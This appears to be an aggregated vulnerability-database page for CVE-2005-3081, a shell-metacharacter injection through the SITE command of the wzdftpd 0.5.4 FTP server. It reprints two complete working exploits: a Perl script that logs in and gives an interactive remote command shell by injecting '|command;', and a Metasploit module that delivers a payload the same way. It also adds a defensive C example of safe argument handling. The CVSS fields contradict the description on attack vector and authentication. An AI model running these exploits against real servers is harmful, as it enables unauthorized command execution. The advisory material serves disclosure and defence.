CVE-2005-3081
CVSS 4.6
Published: 2005-09-27 16:03:00
Last revised: 2008-09-05 16:53:24

[Original] wzdftpd 0.5.4 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the SITE command.


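[CNNVD] Wzdftpd SITE Command Arbitrary Command Execution Vulnerability (CNNVD-200509-251)

        wzdftpd is a modular, cross-platform, multithreaded FTP server.
        A security vulnerability exists in wzdftpd 0.5.4: remote authenticated users can execute arbitrary commands via shell metacharacters in the SITE command.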

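- CVSS (Base Score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]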

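- CPE (Affected Platforms and Products)

Product and version information (CPE) is not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found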

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3081
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3081
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-251
(Official data source) CNNVD

- Other Links and Resources

http://www.securityfocus.com/bid/14935
(UNKNOWN)  BID  14935
http://www.securiteam.com/exploits/5CP0R1PGUE.html
(VENDOR_ADVISORY)  MISC  http://www.securiteam.com/exploits/5CP0R1PGUE.html
http://www.osvdb.org/19682
(UNKNOWN)  OSVDB  19682
http://secunia.com/advisories/16936
(VENDOR_ADVISORY)  SECUNIA  16936
http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0646.html
(UNKNOWN)  FULLDISC  20050924 It's time for some warez - wzdftpd remote exploit
http://www.debian.org/security/2006/dsa-1006
(UNKNOWN)  DEBIAN  DSA-1006

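- Vulnerability Information

Wzdftpd SITE Command Arbitrary Command Execution Vulnerability
Medium severity  Input validation
2005-09-27 00:00:00 2005-10-20 00:00:00
Remote
        wzdftpd is a modular, cross-platform, multithreaded FTP server.
        A security vulnerability exists in wzdftpd 0.5.4: remote authenticated users can execute arbitrary commands via shell metacharacters in the SITE command.

- Advisories and Patches

        No data available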

- Vulnerability Information (1231)

WzdFTPD <= 0.5.4 Remote Command Execution Exploit (EDBID:1231)
linux remote
2005-09-24 Verified
21 Kingcope
N/A
######################################################
# 0day0day0day0day0day0day0day
# -------------------------------
# wzdftpd remote exploit by kcope
# nice call to popen(3) on custom 
# site commands...
#
# August 2005
# confidential! keep private!
# -------------------------------
# 0day0day0day0day0day0day0day
#
#                    .___ _____  __             .___
#__  _  __________ __| _// ____\/  |_______   __| _/
#\ \/ \/ /\___   // __ |\   __\\   __\____ \ / __ | 
# \     /  /    // /_/ | |  |   |  | |  |_> > /_/ | 
#  \/\_/  /_____ \____ | |__|   |__| |   __/\____ | 
#               \/    \/             |__|        \/ 
#                                      
#__  _  _______ _______   ____ ________
#\ \/ \/ /\__  \\_  __ \_/ __ \\___   /
# \     /  / __ \|  | \/\  ___/ /    / 
#  \/\_/  (____  /__|    \___  >_____ \
#              \/            \/      \/ VER1
######################################################

use Net::FTP;

sub usage {
	print "usage: wzdftpdwarez.pl remote_host remote_port user pass custom_site_command\n"
	     ."default guest account for wzdftpd is username/password: guest/%\n";
}

print "
wzdftpd remote exploit by kcope
August 2005
confidential! keep private!

";

if ($#ARGV < 4) {
	usage();
	exit();	 
}

$host = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
$sitecmd = $ARGV[4];

$ftp = Net::FTP->new(Host => $host, Port => $port, Debug => 0)
     or die "Cannot connect to $host: $@";

$ftp->login($user, $pass)
     or die "Cannot login ", $ftp->message;
     
print "Now you can type commands, hopefully as r00t!\n";
while(1) {
	print "!\$%&#>";
	$cmd=<stdin>;
	$ftp->site($sitecmd, "|$cmd;");
	print $ftp->message();
}

# milw0rm.com [2005-09-24]
		

- Vulnerability Information (1292)

WzdFTPD <= 0.5.4 (SITE) Remote Command Execution Exploit (meta) (EDBID:1292)
multiple remote
2005-11-04 Verified
21 David Maciejak
N/A
# Reference: http://www.milw0rm.com/id.php?id=1231 (kcope) /str0ke

# 
# Metasploit plugin for: Wzdftpd SITE Command Arbitrary Command Execution
# 2005 11 26 - David Maciejak
#

package Msf::Exploit::wzdftpd_site;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info = {
	'Name'     => 'Wzdftpd SITE Command Arbitrary Command Execution',
	'Version'  => '$Revision: 1.0 $',
	'Authors'  => [ 'David Maciejak <david dot maciejak at kyxar dot fr>' ],
	'Arch'     => [ ],
	'OS'       => [ ],
	'Priv'     => 1,
	'UserOpts' =>
	  {
		'RHOST'  => [1, 'ADDR', 'The target address'],
		'RPORT'  => [1, 'PORT', 'The target port', 21],
		'USER'   => [1, 'DATA', 'Username', 'guest'],
		'PASS'   => [1, 'DATA', 'Password', '%'],
		'SITECMD'=> [1, 'DATA', 'Custom site command'],
	  },

	'Description' => Pex::Text::Freeform(qq{
		This module exploits an arbitrary command execution vulnerability in Wzdftpd
		threw SITE command. Wzdftpd version to 0.5.4 are vulnerable.
}),
	'Refs' =>
	  [
		['BID', '14935'],
	  ],

	'Payload' =>
	  {
		'Space' => 128,
		'Keys'  => ['cmd','cmd_bash'],
	  },

	'Keys' => ['wzdftpd_site'],
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Check {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');

	my $s = Msf::Socket::Tcp->new
	(
		'PeerAddr'  => $target_host, 
		'PeerPort'  => $target_port, 
	);
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return $self->CheckCode('Connect');
	}
	my $res = $s->Recv(-1, 5);
	$s->Close();
    
	if (! $res) {
            $self->PrintLine("[*] No FTP banner");
            return $self->CheckCode('Unknown');
	}

	if ($res =~ /220 wzd server ready/) 
	{
		$self->PrintLine("[*] FTP Server is a wzdftpd server");
		return $self->CheckCode('Appears');
	}
	else
	{
		$self->PrintLine("[*] FTP Server is probably not vulnerable");
		return $self->CheckCode('Safe');
	}
}

sub Exploit {
	my $self = shift;
	my $target_host    = $self->GetVar('RHOST');
	my $target_port    = $self->GetVar('RPORT');
	my $custom_site_cmd=$self->GetVar('SITECMD');
	my $encodedPayload = $self->GetVar('EncodedPayload');
	my $cmd            = $encodedPayload->RawPayload;
	my $user	   = $self->GetVar('USER');
	my $pass	   = $self->GetVar('PASS');
	
	my $s = Msf::Socket::Tcp->new(
		'PeerAddr' => $target_host,
		'PeerPort' => $target_port,
	  );

	if ($s->IsError){
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$self->PrintLine("[*] Establishing a connection to the FTP server ...");

	$s->Send("USER ".$user);

	my $result = $s->Recv(-1, 20);
	if (!($result=~/\d{3} User .+ okay, need password/))
	{
		$self->PrintLine("[*] Invalid user");
		return;
	}

	$s->Send("PASS ".$pass);
	$result = $s->Recv(-1, 20);

	if (!($result=~/\d{3} User logged in/))
	{
		$self->PrintLine("[*] Invalid password");
		return;
	}
	
	$s->Send("SITE ".$custom_site_cmd." | $cmd;");
	$result = $s->Recv(-1, 20);
	if (!($result=~/^200/))
	{
		$self->PrintLine("[*] Error: $result");
		return;
	}

	$self->PrintLine('');
	my @results = split ( /\n/, $result );
	chomp @results;
	for (my $i = 1; $i < @results -1; $i++){
			$self->PrintLine("$results[$i]");
	}
	return;
}

1;

# milw0rm.com [2005-11-04]
		

- Vulnerability Information

19682
wzdftpd SITE Command Arbitrary Command Execution
Exploit Public

- Vulnerability Description

Unknown or Incomplete

- Timeline

2005-09-24 Unknown
2005-09-24 Unknown

- Solution

Unknown or Incomplete

- Related References

- Vulnerability Credit

Unknown or Incomplete

- Vulnerability Information

Wzdftpd SITE Command Arbitrary Command Execution Vulnerability
Input Validation Error 14935
Yes No
2005-09-24 12:00:00 2006-12-15 08:23:00
Discovery is credited to kcope.

- Affected Software Versions

wzdftpd wzdftpd 0.5.4
wzdftpd wzdftpd 0.5.2
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1

- Vulnerability Discussion

The 'wzdftpd' utility is affected by a remote arbitrary command-execution vulnerability.

This issue can allow an attacker to execute commands in the context of an affected server and potentially gain unauthorized access.

Version 0.5.4 of wzdftpd is reported to be vulnerable. Other versions may be affected as well.
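
An added illustration, not wzdftpd's own code and not part of the original advisory: the shell-metacharacter flaw described above, shown as a generic vulnerable pattern next to a hardened form that validates the argument and bypasses the shell. All function names are hypothetical, and the hardened form assumes the custom SITE script takes a single argument.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* All names here are hypothetical; this is not wzdftpd source code. */

/* Vulnerable pattern: client-controlled SITE arguments are pasted into a
 * command line for popen(3), which hands the whole string to /bin/sh, so
 * characters such as | ; ` $ & are interpreted by the shell. */
FILE *site_exec_unsafe(const char *script, const char *args)
{
    char line[1024];
    snprintf(line, sizeof line, "%s %s", script, args);
    return popen(line, "r");
}

/* Allow-list check: non-empty, bounded length, no leading '-' (so it cannot
 * be read as an option), and only plain filename characters. */
int site_arg_is_safe(const char *arg)
{
    static const char ok[] = "abcdefghijklmnopqrstuvwxyz"
                             "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._/-";
    size_t n = strlen(arg);
    return n > 0 && n < 256 && arg[0] != '-' && strspn(arg, ok) == n;
}

/* Hardened form: validate, then fork and execv with an argv array. No shell
 * is involved, so the argument reaches the script as one literal string.
 * Returns the script's exit status, or -1 if rejected or on error. */
int site_exec_safe(const char *script, const char *arg)
{
    if (!site_arg_is_safe(arg))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)script, (char *)arg, NULL };
        execv(script, argv);
        _exit(127);               /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The allow-list is deliberately narrow; widen it only for characters a specific script is known to need, and keep the execv path so that a validation gap still does not reach a shell.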

- Exploit

An exploit is not required.

A proof of concept (wzdftpd_site.pm) Metasploit Framework exploit has been released.

- Solution



Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com

Please see references for more information and advisories.


wzdftpd wzdftpd 0.5.2

- Related References

 

 
